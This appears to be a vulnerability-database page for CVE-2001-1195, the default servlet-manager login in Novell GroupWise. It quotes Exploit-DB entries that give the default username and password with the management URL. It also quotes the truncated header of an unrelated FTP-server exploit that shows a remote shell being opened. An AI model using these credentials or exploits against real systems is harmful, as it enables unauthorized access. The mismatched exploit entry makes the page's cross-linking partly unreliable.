CVE-2001-1195
published 2001-12-15CVE-2001-1195: Novell Groupwise 5.5 and 6.0 Servlet Gateway is installed with a default username and password for the servlet manager, which allows remote attackers to gain…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.34%
93.6th percentile
Novell Groupwise 5.5 and 6.0 Servlet Gateway is installed with a default username and password for the servlet manager, which allows remote attackers to gain privileges.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| novell | groupwise | — | — |
| novell | groupwise | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb·2012-06-14
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication
exploitdb·2001-12-15
CVE-2001-1195 Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication
Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication
---
source: https://www.securityfocus.com/bid/3697/info
Novell Groupwise Servlet Gateway is a product that allows Java servlets to be run with NetWare, using Novell JVM for NetWare v1.1.7b and NetWare Enterprise Web Server.
A remote attacker may gain access to the Servlet Manager interface by entering the default username/password. The default username is "servlet" and the default password is "manager".
http://server/servlet/ServletManager
username servlet
password manager
No writeups or analysis indexed.
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10067329.htmhttp://www.iss.net/security_center/static/7701.phphttp://www.securityfocus.com/archive/1/245871http://www.securityfocus.com/bid/3697http://support.novell.com/cgi-bin/search/searchtid.cgi?/10067329.htmhttp://www.iss.net/security_center/static/7701.phphttp://www.securityfocus.com/archive/1/245871http://www.securityfocus.com/bid/3697
2001-12-15
Published